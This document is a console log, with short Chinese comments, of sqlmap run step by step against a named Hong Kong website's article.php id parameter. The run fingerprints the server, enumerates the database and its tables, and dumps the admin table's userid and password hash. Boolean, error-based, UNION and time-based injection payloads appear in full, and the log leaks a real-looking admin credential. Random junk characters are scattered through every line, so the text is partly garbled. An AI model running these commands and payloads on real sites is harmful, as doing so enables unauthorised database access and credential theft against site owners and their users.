D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 j% i$ O3 I( ~7 o- u- P. z) d/ }ms "Mysql" --current-user /* 注解:获取当前用户名称 n( ^, O6 w f$ b% |. ]
sqlmap/0.9 - automatic SQL injection and database takeover tool3 T: @' b B6 c
http://sqlmap.sourceforge.net starting at: 16:53:54- Y7 L. l4 @4 F# k q: a
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 j( E, r- m7 I& R2 |+ ~
session file8 { K. r$ W! R9 z& ?0 t7 `
[16:53:54] [INFO] resuming injection data from session file
4 x3 f2 d( |- x4 p6 A[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file( l! f+ z! g. e+ P% {1 A$ g6 H
[16:53:54] [INFO] testing connection to the target url
s3 s' p6 y. R. X. J! ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 v ^9 p0 E& Y7 y! b. g: [) q% C& p
sts:* V5 k* M: }2 u" y1 b! ? u: x! M# [0 p
---
- h- B+ T# t$ {! ^Place: GET
# a- H Z; D3 p! \2 C- XParameter: id
3 B5 q+ T7 W: C1 m Type: boolean-based blind
# r4 q& H' Q* S( P1 v' P Title: AND boolean-based blind - WHERE or HAVING clause
9 w. w! \+ T! ~& S2 l Payload: id=276 AND 799=799( n8 q3 z5 @! y& \6 M! t. {
Type: error-based
; p& W1 r: ?; L. s7 E3 y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
' r2 h0 I% T' m, u$ `+ |) l Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" D y. T; `8 h1 p$ A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 O) h! ~- J% H1 k* Q/ S
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 q- v' J/ i0 { Type: UNION query1 T8 {0 g. g6 ?5 G1 Q
Title: MySQL UNION query (NULL) - 1 to 10 columns9 G6 R# j4 }2 M e# M' _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( N0 P3 _4 k1 N4 w
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( ~& l% ^1 ^3 z7 j: f0 L; `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## n. U( m: Z, K' @! k9 W
Type: AND/OR time-based blind6 {. B# X6 n4 X% X- i
Title: MySQL > 5.0.11 AND time-based blind4 k; {! b, t$ B% R* e, C0 b9 C
Payload: id=276 AND SLEEP(5)
/ W* q# I' ~- |$ q" m! J---$ E }! C% K' v( f6 w
[16:53:55] [INFO] the back-end DBMS is MySQL" G% b4 j- `2 P! U, M1 o' Q
web server operating system: Windows
0 c( M" l' q+ p& Z' {) Yweb application technology: Apache 2.2.11, PHP 5.3.02 s2 g2 U) S+ C" \1 O* F
back-end DBMS: MySQL 5.0
1 `0 @3 j v z. D; a, O1 }[16:53:55] [INFO] fetching current user
$ M9 Q; `: W6 J- _current user: 'root@localhost'
3 V& W$ \% Q+ _[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& `& _4 q$ _( `2 j7 C) @tput\www.wepost.com.hk' shutting down at: 16:53:581 A( ?3 V& I' Y+ E( M/ W8 M
6 R" |# ]/ P" W7 U; c
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 R' @9 J" ^$ o! a! I
ms "Mysql" --current-db /*当前数据库
$ x! W; ]; C! R sqlmap/0.9 - automatic SQL injection and database takeover tool' [/ |+ H- X; F, X$ ^
http://sqlmap.sourceforge.net starting at: 16:54:16
7 v/ B% D' r% x. l H[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
+ k, T& h5 O8 I9 u4 i# Q0 y# ^7 V9 L session file
. K: X) i/ }, |5 ]* F9 Q[16:54:16] [INFO] resuming injection data from session file
# P" _. G+ Y& \ } u[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file8 l+ u: D7 _( ^& P
[16:54:16] [INFO] testing connection to the target url
& ~) I# |6 h1 I1 Qsqlmap identified the following injection points with a total of 0 HTTP(s) reque, I* @3 P( V* i) X0 C$ A
sts:
3 i7 _; C1 t) ?, s" E( w% ^---. Y G) ~$ e% a% Q' q( I
Place: GET7 P9 @$ H, r9 A) D+ O
Parameter: id( A8 i. G6 v2 L9 i6 K
Type: boolean-based blind/ u: Y% {/ Y) m% Q% z* {5 z
Title: AND boolean-based blind - WHERE or HAVING clause
# B/ y; K: _! \. l5 X) `8 J7 L Payload: id=276 AND 799=799
* [0 D( b. n4 d9 \/ R. i Type: error-based, c9 ]& c6 y) H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
* U% v: ]: C$ R Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 ?6 o; _- X* t& ^# J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 U- d4 s! B' I# u5 }" c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% E1 O& W a' A8 u Type: UNION query4 S; C4 q# Y- N; S
Title: MySQL UNION query (NULL) - 1 to 10 columns4 l2 C6 Z" H0 Q9 a$ J2 a
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
' z* h& g; u/ ^8 A2 {1 ^& a3 g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
8 O" Y7 ]+ F3 x( w1 R uCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# R D( p- w8 T' @3 I- @5 E
Type: AND/OR time-based blind
0 B. z. v( B8 } Title: MySQL > 5.0.11 AND time-based blind
9 h" H+ ^- b7 k) Z- Z6 N ? Payload: id=276 AND SLEEP(5)( t& i/ ?0 ]# p) w6 U( \% R
---
2 ~) \8 P0 b" Z+ `# a" l[16:54:17] [INFO] the back-end DBMS is MySQL8 B3 K1 U" q2 n! k4 |
web server operating system: Windows# s2 n) R3 F8 R2 B, {( U# z
web application technology: Apache 2.2.11, PHP 5.3.0
, ]5 x: n6 w, ]back-end DBMS: MySQL 5.0
" T9 l- D: R* {& G) f[16:54:17] [INFO] fetching current database
+ N8 O! A5 w6 d5 l# B" Mcurrent database: 'wepost'
- Y! `+ f! Z" m( C; c[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ S, O- ^1 R1 x3 l
tput\www.wepost.com.hk' shutting down at: 16:54:18
( i& g$ B# p6 t1 jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
l5 K' J; x+ t3 p, Dms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
- Z/ {4 D5 g! X, M& E x sqlmap/0.9 - automatic SQL injection and database takeover tool8 ~" `/ _0 s L% U8 v3 v8 b; {9 p, G) {
http://sqlmap.sourceforge.net starting at: 16:55:258 ?3 g! o1 Z7 O. V `8 _" c
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as; r+ o- r6 [( f0 ^0 u7 J7 @
session file% I) F2 I/ ~! h$ ?0 {# ^0 ?( }/ n& G8 V
[16:55:25] [INFO] resuming injection data from session file( |5 v n. p0 u3 K2 q5 e' J7 _3 ~! I" D
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* m! ?4 z' P; K7 S. ?8 H! j) B H[16:55:25] [INFO] testing connection to the target url
, G7 \5 m$ u8 @! q% @1 H) Z( fsqlmap identified the following injection points with a total of 0 HTTP(s) reque
; b" f) T2 W1 P" J3 w g- Jsts:
2 q3 l8 d {% z* M- h---
. i1 E' S+ C! |- [7 v9 A% l; j' ZPlace: GET
0 M9 Z6 |7 ]9 Y/ ~# F* zParameter: id
) e6 C/ T6 {" \* Q4 ?0 g" K/ j; Z Type: boolean-based blind
2 R* ^/ g5 r g( k" A Title: AND boolean-based blind - WHERE or HAVING clause9 h/ \3 ?4 x1 V7 P. w# ?) R
Payload: id=276 AND 799=799& j S, ~* e- w) ?3 v" W
Type: error-based
3 i( l" \; R' A9 v9 P Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& h9 b( [$ s: w Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) S' R- \5 ?: H* W7 j" V
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ j3 B$ X. w) y" J) I& B$ x),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# ^# ?# C8 ^) j0 \. G
Type: UNION query
' D& a. b) i5 Y2 X! z Title: MySQL UNION query (NULL) - 1 to 10 columns( ]8 s/ V! B2 g, I
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 R% z3 q/ l8 F2 A, }(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 C7 s" j) N( c! Z% p- B6 B; ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# G8 z$ T0 D3 x4 f" x! ? N Type: AND/OR time-based blind
8 ]0 `1 L. y, i/ t% x- S: C Title: MySQL > 5.0.11 AND time-based blind) T* @6 G; b) P" L
Payload: id=276 AND SLEEP(5)6 O2 `$ B+ c# }, [
---
! l1 @3 Z( r7 A[16:55:26] [INFO] the back-end DBMS is MySQL
. t, P! }# g( @web server operating system: Windows
4 B1 J+ U, U& s- Gweb application technology: Apache 2.2.11, PHP 5.3.0, X8 _2 [& n" Y: v3 S* o0 L
back-end DBMS: MySQL 5.01 E) A" E2 C" V6 }# [$ N" e8 |/ \
[16:55:26] [INFO] fetching tables for database 'wepost'
* W$ t! }1 I0 r3 t[16:55:27] [INFO] the SQL query used returns 6 entries
4 b- ]1 s% {5 b) ]; S2 qDatabase: wepost7 a' X( i4 e6 W2 H- J) n
[6 tables]
+ X% x9 T( M, C+ D2 z+-------------+
6 }+ q$ J! V1 Q/ d6 P+ r| admin |
" g; L8 T9 y$ w4 F8 t; i| article |" X- R4 [1 A5 \' O# ?
| contributor |
7 q& O2 `0 ~" w+ o7 X| idea |5 r1 P, S. Q7 X7 P& A1 u
| image |6 F+ I, M& d9 R3 M
| issue |
5 G7 ?+ M( c* ^* J+-------------+, J B" w% P5 i8 y
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 g( r4 K# k5 j9 V( p. Btput\www.wepost.com.hk' shutting down at: 16:55:33/ N" D; G7 R( w! v
. `( z, b$ k, h m6 ^
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 F6 ]9 v# z: y8 }! C' O" i- H
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名- K1 l0 O: ]3 L# c/ m( M7 K
sqlmap/0.9 - automatic SQL injection and database takeover tool
: c1 z+ ^( w. R4 ^2 T http://sqlmap.sourceforge.net starting at: 16:56:06
; Z( Q8 y! m+ d7 A8 Tsqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 |, h' g" d6 q0 z: ^1 nsts:
3 T7 G' r% D% h+ z% Y+ S% \---# Z8 M0 E7 M9 v+ X
Place: GET" F" a" L+ }9 I) B3 U9 b7 t o8 I
Parameter: id
; t% e) b+ u1 W9 ^( w. m Type: boolean-based blind
" n Q# u. o* M2 L' A: q Title: AND boolean-based blind - WHERE or HAVING clause
9 m2 e% s& L7 z7 h8 B: { Payload: id=276 AND 799=799
0 K( D/ E W+ Y2 H+ m Type: error-based( q& Z; o% g- e e1 q- i' A% k3 W! H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' H) E/ _3 d$ a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 ^9 ]$ J- A3 U* O120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* |( k+ `2 O$ L0 f/ d),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ g1 C1 N# C# d, M, y8 c Type: UNION query: w, E# E$ D5 ?
Title: MySQL UNION query (NULL) - 1 to 10 columns
) T( h# Y% }# J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 }" p7 Y! R3 i: f/ Y v- m(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* x9 u2 {$ M$ e$ g" r2 ~6 Q7 PCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; b7 y, T9 V" a Type: AND/OR time-based blind
+ O& N$ n4 H/ I Title: MySQL > 5.0.11 AND time-based blind7 x- m" p& L# ^- v4 X5 D6 n6 c' |" V
Payload: id=276 AND SLEEP(5)& `$ W5 |# {3 W% j$ Q8 T
---
- _) j4 {% W& z: N6 z& a/ Z' ~. nweb server operating system: Windows' P3 W& t$ f1 i4 h) V: {
web application technology: Apache 2.2.11, PHP 5.3.0
+ w- t5 P( t$ |! z5 y8 j2 _, V' Gback-end DBMS: MySQL 5.0
% i* z! p Z! a- a[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se$ o7 z3 o: ]) W' u
ssion': wepost, wepost) H6 X4 [& Q$ u F9 [
Database: wepost! J: X. C: Q. C
Table: admin! _- {/ v+ Y" v3 \4 V
[4 columns]5 o3 S3 V5 y% E6 m$ u' I
+----------+-------------+
_- |+ m y: d( P* k5 f| Column | Type |
: H# l$ |8 L$ y0 T, d" _+----------+-------------+- U# a' \8 j! w7 @ Y1 U p$ _
| id | int(11) |
" q9 j( X# W, B' T% p) Q| password | varchar(32) |
& V# M. {- x% ]: z| type | varchar(10) |# ^' j4 O* R7 f& M/ u$ T
| userid | varchar(20) |
+ B/ F4 _8 E1 {0 S0 v9 A+----------+-------------+/ D, K" H% `. O" N6 F
shutting down at: 16:56:19! q4 }/ _: v9 {& o+ K. t
# L) n. K" W/ f4 U6 f* }3 oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 h% |9 V: p! Yms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
% e, o2 u3 _. H. T7 d2 ~, y9 Q' v: ^ sqlmap/0.9 - automatic SQL injection and database takeover tool
# ^0 Z" P- q: h J- G- ?( ^ http://sqlmap.sourceforge.net starting at: 16:57:146 S& \' |+ P1 U9 S
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ p$ E3 g1 J, `8 ~sts:0 P, \. f2 j/ P9 f8 H$ k7 O
---
+ K5 J- K) w9 s7 N6 z* T5 lPlace: GET3 f6 v1 }3 T8 f& Y
Parameter: id3 G/ l) Z5 W6 Q* e6 m/ T
Type: boolean-based blind0 V2 `6 j; @$ x+ z W+ l8 M
Title: AND boolean-based blind - WHERE or HAVING clause
2 P" } G& i: O: C" j$ y3 n& k1 E- @ Payload: id=276 AND 799=799' H; N' k+ ?4 O( x; @4 i) D
Type: error-based- R0 P& M. Y6 D4 [% f4 H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% M: O v( j# n# N; p/ g Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, E) p' Z }. G: |: T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 v$ m$ c0 u ]" z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 j0 |$ x4 ~$ w0 M# w
Type: UNION query% R2 H7 ?. h( y# K1 U
Title: MySQL UNION query (NULL) - 1 to 10 columns
% k8 `8 O8 a! |8 _( {+ w" O: N, H Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 i+ p8 `2 S- b9 ^0 ^# z% t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 W" q: j+ r2 C+ V$ y- WCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 r, ^2 o' y' h. P3 ]
Type: AND/OR time-based blind
; O7 d+ |6 E2 V( B! f Title: MySQL > 5.0.11 AND time-based blind
1 I% G7 m. G6 z1 ]0 m Payload: id=276 AND SLEEP(5)+ b! _5 N) |- i. N" J
---
+ n. J/ A% c/ Vweb server operating system: Windows& [: v& Q- T4 X6 [/ t4 w: A( i, F
web application technology: Apache 2.2.11, PHP 5.3.05 ]# S0 p; o& _) N0 T
back-end DBMS: MySQL 5.0
* M' F; s# f4 \, o+ n* V! H. \recognized possible password hash values. do you want to use dictionary attack o* B7 ~) i# C7 v2 S- B; \5 z9 @
n retrieved table items? [Y/n/q] y. e( H) i* [1 d" r: O" o
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]5 M1 }( W: |( o- B/ F" j t4 K
do you want to use common password suffixes? (slow!) [y/N] y
! _' l: I4 l0 v8 Y5 RDatabase: wepost
) h6 c1 x1 \7 H* LTable: admin
& X; S4 p8 w9 {- ^& [9 C# m7 Y, d[1 entry]
. g. @* i- X/ y' e8 b/ t+----------------------------------+------------+
5 G5 ]# K: K D: @| password | userid |0 \. L' V. \5 a+ Y
+----------------------------------+------------+
& \5 W% c! C) o# F9 k5 l| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |' T7 @% j. y( ^: |+ o0 y
+----------------------------------+------------+) k! _4 }; ] m7 D0 U! K
shutting down at: 16:58:14
# H6 R( m4 e2 a! R+ |, z9 P1 o3 Z2 o8 ]$ L$ ?7 }1 k) ^$ j3 }
D:\Python27\sqlmap> |